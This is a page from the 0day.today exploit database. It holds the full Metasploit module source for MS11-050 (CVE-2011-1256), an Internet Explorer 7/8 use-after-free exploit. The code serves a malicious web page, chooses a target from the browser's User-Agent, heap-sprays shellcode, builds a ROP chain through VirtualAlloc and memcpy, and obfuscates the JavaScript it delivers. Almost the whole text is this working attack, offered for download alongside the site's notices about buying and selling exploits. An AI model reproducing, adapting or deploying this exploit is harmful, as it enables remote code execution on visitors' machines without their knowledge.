0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS11-050 IE mshtml!CObjectElement Use After Free
## # $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "7.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, }) def initialize(info={}) super(update_info(info, 'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free", 'Description' => %q{ This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and attempts to call a function on it, leading to the use-after-free. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 12962 $", 'Author' => [ 'd0c_s4vage', ], 'References' => [ ['CVE', '2011-1256'], ['OSVDB', '72948'], ['MSB', 'MS11-050'], ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # In IE6 the mshtml!CObjectElement size is 0xac [ 'Win XP SP3 Internet Explorer 7', # 7.0.5730.13 { # sizeof(mshtml!CObjectElement) 'FreedObjSize' => 0xb0, 'FakeObjCount' => 0x4000, 'FakeObjCountKeep' => 0x2000, 'ForLoopNumObjects' => 3, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>0, 'ROP' => false, } ], [ 'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702 { # sizeof(mshtml!CObjectElement) 'FreedObjSize' => 0xe0, # 0xdc rounded up 'FakeObjCount' => 0x8000, 'FakeObjCountKeep' => 0x3000, 'ForLoopNumObjects' => 5, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>0, 'ROP' => false, } ], [ 'Win XP SP3 Internet Explorer 8', { 'FreedObjSize' => 0xe0, # 0xdc rounded up 'FakeObjCount' => 0x8000, 'FakeObjCountKeep' => 0x3000, 'ForLoopNumObjects' => 5, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>2, #'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll 'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll 'ROP' => true, } ], [ 'Debug Target (Crash)', {} ], ], 'DisclosureDate' => "Jun 16 2011", 'DefaultTarget' => 0)) end def auto_target(cli, request) agent = request.headers['User-Agent'] if agent =~ /MSIE 8\.0/ mytarget = targets[3] # IE 8 elsif agent =~ /MSIE 7\.0/ mytarget = targets[1] else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end # 3/22/2011 # fully patched x32 WinXP SP3, IE 8.0.6001.18702 def winxp_sp3_rva { #"kernel32!VirtualAlloc" => 0x7c809af1, "kernel32!VirtualAlloc" => 0x7c809ae1, "ntdll!memcpy" => 0x7c901db3, } end def compile_rop(rop_stack) rva = winxp_sp3_rva() num_random = 0 rop_stack.map do |rop_val| case rop_val when String if rop_val == "random" # useful for debugging # num_random += 1 # 0xaabbcc00 + num_random rand(0xffffffff) else raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val] rva[rop_val] end when Integer rop_val else raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}" end end.pack("V*") end def on_request_uri(cli, request) mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) unless mytarget send_not_found(cli) return end end @mytarget = mytarget @debug = true if mytarget == targets[4] return if ((p = regenerate_payload(cli)) == nil) id_name = rand_text_alpha(5) dir_name = rand_text_alpha(3) if @debug data = <<-DATA <html> <body> <script language='javascript'> document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>"; document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>"; document.body.innerHTML += "AAAAAAA"; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>"; </script> </body> </html> DATA print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") send_response(cli, data, { 'Content-Type' => 'text/html' }) return end raw_shellcode = payload.encoded shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch)) spray = nil rop_shellcode_spray = nil obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V") if @mytarget['ROP'] rop_stack = [] 0x1f.times do |i| rop_stack << "random" end idx = -1 idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc" # 1: idx += 1 ; rop_stack[idx] = "ntdll!memcpy" # 2:ret 10 to this after VirtualAlloc idx += 1 ; rop_stack[idx] = 0x7f000000 # 1:VirtualAlloc:lpAddress idx += 1 ; rop_stack[idx] = 0x4000 # 1:VirtualAlloc:dwSize idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000) # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE idx += 1 ; rop_stack[idx] = 0x40 # 1:VirtualAlloc:flProtect rwx idx += 1 ; rop_stack[idx] = 0x7f001000 # 3:into this after memcpy idx += 1 ; rop_stack[idx] = 0x7f001000 # 2:memcpy:dst idx += 1 ; rop_stack[idx] = 0x23000100 # 2:memcpy:src idx += 1 ; rop_stack[idx] = 0x2fff # 2:memcpy:size # align the rest of it back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length) rop_stack = back + rop_stack rop_stack << @mytarget['StackPivot'] # align the stack for 0c0c0c0c front = rop_stack.slice!(0, 19) rop_stack = rop_stack + front # resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc) rop = compile_rop(rop_stack) nops = make_nops(0x1000 - raw_shellcode.length) nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch)) #spray up to 0x23000000 rop_shellcode_spray = <<-JS var shellcode = unescape("#{shellcode}"); var nops = unescape("#{nops}"); while(nops.length < 0x1000) nops += nops; var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode; while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock; var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2); for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); } JS spray = rop shellcode = "" else spray = obj_overwrite_ptr end spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch)) js = <<-JS heap_obj = new heapLib.ie(0x20000); var heapspray = unescape("#{spray}"); while(heapspray.length < 0x1000) heapspray += heapspray; var shellcode = unescape("#{shellcode}"); var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode; var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"}; var front = heapblock.substring(0, offset); var end = heapblock.substring(offset); heapblock = end + front; while(heapblock.length < 0x20000) heapblock += heapblock; finalspray = heapblock.substring(0, (0x10000-6)/2); for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); } #{rop_shellcode_spray} var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}"); while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; } obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2); for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) { document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>"; } for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); } for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); } document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>"; document.body.innerHTML += "AAAA"; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>"; JS js = heaplib(js) js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate html = <<-HTML <html> <body> <script language='javascript'> #{js} </script> </body> </html> HTML print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end # 0day.today [2024-12-24] #